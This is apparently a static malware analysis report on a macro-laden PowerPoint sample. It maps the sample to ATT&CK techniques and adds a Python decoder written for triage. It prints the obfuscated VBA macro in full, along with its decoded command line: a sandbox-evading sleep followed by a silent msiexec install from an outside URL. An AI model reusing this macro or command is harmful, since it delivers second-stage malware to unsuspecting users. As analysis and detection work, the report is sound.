Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a7b6d5915decb78a…

MALICIOUS

Office (OOXML)

Size: 377.3 KB
Created: 2021-10-14 16:11:11 UTC
Authoring application: Microsoft Office PowerPoint 16.0000
First seen: 2021-10-24
MD5: 3ed8fc2490c9cbbc9447029d7c2f9941
SHA-1: 612731ca328185c9a1af0273ca00f2fe9d61e953
SHA-256: a7b6d5915decb78a887964a580697e6e4221c35ac844b434ab042214df729310
Risk score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1059.003 Windows Command Shell; T1204.002 Malicious File. The command decoded from the carved macro (see the macros.bas preview under Extracted artifacts) additionally maps to T1218.007 System Binary Proxy Execution: Msiexec and T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion.

The sample is a PowerPoint OOXML document carrying a VBA project. The macro rebuilds a command string by splitting a long blob on the junk token "ahgkl" and joining the pieces back together (the bevmvxa function in the carved macros.bas), then hands the result to WScript.Shell.Run with a window style of 0 (70 - 70), i.e. a hidden window. Decoded, the string is:

cmd /c t^IMe^oUt 73 && ^MS^IE^Xe^C /i https://www.logicalnetworksolution.com/nx/t1.msi  /qn

The carets are cmd.exe escape characters and are dropped when cmd parses the line, so the command that actually runs is timeout 73 && msiexec /i https://www.logicalnetworksolution.com/nx/t1.msi /qn: a 73-second sleep, which commonly outlasts sandbox execution windows, followed by a silent install of a remotely hosted MSI package. That msiexec call is the second-stage download and execution. The execution path is the CreateObject("WSCript.shell") and .Run calls in the matched lines; the script contains no Shell() call. The carved source does not show an auto-execution entry point (the only subroutine is lbjmxdvgarlswwctuigl). The customUI schema URL recorded under Embedded URL is consistent with a custom ribbon part being used as the trigger, which is the usual way PowerPoint macros are made to run without user interaction with the macro itself, but the callback wiring is not visible in the extracted source.

Heuristics 6

  • ClamAV: Doc.Macro.CmdC-6249572-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.CmdC-6249572-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    ckhlqlcwriu = 70 - 70
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    qpbimaoqsuwat = "WSCript.shell"
    Set oghedpbc = CreateObject(qpbimaoqsuwat)
    pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/01/customui In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1121 bytes
SHA-256: 75c5fc6bb09e07f9c07562a60d16f98b38a1cde0c4cff606eac77586cff1d8e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
27 of 40 identifiers look randomly generated (e.g. 'ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgklaahgk'), consistent with name-mangling obfuscation. Note that the quoted example is not a real identifier: the tokenizer has cut it out of the "ahgkl"-delimited command string. The "1 long base64-like blob" flagged here is that same delimited string (the argument to bevmvxa); it is not base64 and decodes by removing the token, as the macro itself does.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ycfbxogjvtj"

Attribute VB_Name = "hllrtkfma"
Sub lbjmxdvgarlswwctuigl()

ixmuohgdwlgj = bevmvxa("ahgklcahgklmahgkldahgkl ahgkl/ahgklcahgkl ahgkltahgkl^ahgklIahgklMahgkleahgkl^ahgkloahgklUahgkltahgkl ahgkl7ahgkl3ahgkl ahgkl&ahgkl&ahgkl ahgkl^ahgklMahgklSahgkl^ahgklIahgklEahgkl^ahgklXahgkleahgkl^ahgklCahgkl ahgkl/ahgkliahgkl ahgklhahgkltahgkltahgklpahgklsahgkl:ahgkl/ahgkl/ahgklwahgklwahgklwahgkl.ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgkleahgkltahgklwahgkloahgklrahgklkahgklsahgkloahgkllahgkluahgkltahgkliahgkloahgklnahgkl.ahgklcahgkloahgklmahgkl/ahgklnahgklxahgkl/ahgkltahgkl1ahgkl.ahgklmahgklsahgkliahgkl ahgkl ahgkl/ahgklqahgkln")

On Error Resume Next
lznpl = ixmuohgdwlgj
qcsgwco (lznpl)
End Sub


Sub qcsgwco(dfzdmyyeetsnvt As String)
ckhlqlcwriu = 70 - 70
qpbimaoqsuwat = "WSCript.shell"
Set oghedpbc = CreateObject(qpbimaoqsuwat)
pvvodnojjyjwgx = oghedpbc.Run(dfzdmyyeetsnvt, ckhlqlcwriu)
End Sub

Function bevmvxa(jrpwhlijdlqx As String)
okepilkuuv = "ahgkl"
 ofmckmfolnyg = Split(jrpwhlijdlqx, okepilkuuv)
bevmvxa = Join(ofmckmfolnyg, "")
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 10240 bytes
SHA-256: 616cfcfe89ffaa9815fde4a2bda1e55ce4fd323b527a7b9d4d3383ac9cf8c42c
Detection
ClamAV: Doc.Macro.CmdC-6249572-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s). This is the same "ahgkl"-delimited command string that macros.bas decodes, stored inside the compressed VBA project stream; it is not base64.
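The decoding described in the Malware Insights section and performed by the bevmvxa routine in the carved macros.bas, as an added example written for this report (it is not part of the analysis tool or of the sample). It reproduces Join(Split(s, "ahgkl"), ""), undoes cmd.exe caret escaping, and pulls out the indicators a triage analyst wants: the URL, the sleep, the msiexec install and the matching ATT&CK IDs. It goes slightly beyond the sample in one respect: the delimiter guesser recovers the junk token from the encoded string alone, which is useful when only the string, not the decoding function, survives extraction. That guesser is a heuristic of my own, assumed to hold for tokens of 3 to 8 characters inserted between every real character; the encoded blob below is copied from the macro preview above.

```python
"""Decode the Split/Join-obfuscated command from the carved macros.bas.

Added example for this report (not the analysis tool's or the sample's code).
"""
import re
from collections import Counter
from typing import Optional

# Encoded argument of the bevmvxa(...) call, copied from the carved
# macros.bas shown above. Split across lines purely for readability.
ENCODED = (
    "ahgklcahgklmahgkldahgkl ahgkl/ahgklcahgkl "
    "ahgkltahgkl^ahgklIahgklMahgkleahgkl^ahgkloahgklUahgkltahgkl "
    "ahgkl7ahgkl3ahgkl "
    "ahgkl&ahgkl&ahgkl "
    "ahgkl^ahgklMahgklSahgkl^ahgklIahgklEahgkl^ahgklXahgkleahgkl^ahgklCahgkl "
    "ahgkl/ahgkliahgkl "
    "ahgklhahgkltahgkltahgklpahgklsahgkl:ahgkl/ahgkl/"
    "ahgklwahgklwahgklwahgkl."
    "ahgkllahgkloahgklgahgkliahgklcahgklaahgkllahgklnahgkleahgkltahgklwahgklo"
    "ahgklrahgklkahgklsahgkloahgkllahgkluahgkltahgkliahgkloahgklnahgkl."
    "ahgklcahgkloahgklmahgkl/"
    "ahgklnahgklxahgkl/"
    "ahgkltahgkl1ahgkl."
    "ahgklmahgklsahgkli"
    "ahgkl ahgkl "
    "ahgkl/ahgklqahgkln"
)

_CARET = re.compile(r"\^(.)")
_URL = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def guess_delimiter(blob: str, min_len: int = 3, max_len: int = 8) -> str:
    """Heuristic (my assumption, not a general decoder): the junk token sits
    between every real character, so it occurs once per character and the
    n-gram covering the most characters (count * length) is the token."""
    best, best_score = "", 0
    for n in range(min_len, max_len + 1):
        grams = Counter(blob[i:i + n] for i in range(len(blob) - n + 1))
        if not grams:
            break
        token, count = grams.most_common(1)[0]
        if count >= 2 and count * n > best_score:
            best, best_score = token, count * n
    return best


def split_join_decode(blob: str, delim: str) -> str:
    """Exactly what the macro's bevmvxa does: Join(Split(blob, delim), "")."""
    return "".join(blob.split(delim))


def strip_cmd_carets(command: str) -> str:
    """cmd.exe treats ^ as an escape for the next character, so t^IMe^oUt
    reaches the parser as tIMeoUt. Drop the escapes to read the real command."""
    return _CARET.sub(r"\1", command)


def analyse(blob: str, delim: Optional[str] = None) -> dict:
    """Decode the blob and extract triage indicators from the command line."""
    delim = delim or guess_delimiter(blob)
    raw = split_join_decode(blob, delim)
    plain = strip_cmd_carets(raw)
    tokens = plain.split()
    low = [t.lower() for t in tokens]

    delay = None  # seconds slept before the payload runs, if any
    if "timeout" in low:
        i = low.index("timeout")
        if i + 1 < len(tokens) and tokens[i + 1].isdigit():
            delay = int(tokens[i + 1])
    msi = "msiexec" in low and "/i" in low  # remote package install

    techniques = []
    if low and low[0] == "cmd":
        techniques.append("T1059.003")  # Windows Command Shell
    if delay is not None:
        techniques.append("T1497.003")  # Time Based Evasion
    if msi:
        techniques.append("T1218.007")  # System Binary Proxy Execution: Msiexec

    return {
        "delimiter": delim,
        "raw_command": raw,
        "command": plain,
        "urls": _URL.findall(plain),
        "delay_seconds": delay,
        "msiexec_install": msi,
        "silent": "/qn" in low,
        "techniques": techniques,
    }


if __name__ == "__main__":
    for key, value in analyse(ENCODED).items():
        print(f"{key}: {value}")
```

Pass the delimiter explicitly (analyse(ENCODED, "ahgkl")) when it is known from the macro, as it is here; the guesser is for the case where olevba has given you only the string constants. The caret stripping matters for detection too: a rule that looks for the literal "msiexec" or "timeout" in macro strings misses this sample, because those words only exist after cmd.exe has removed the escapes.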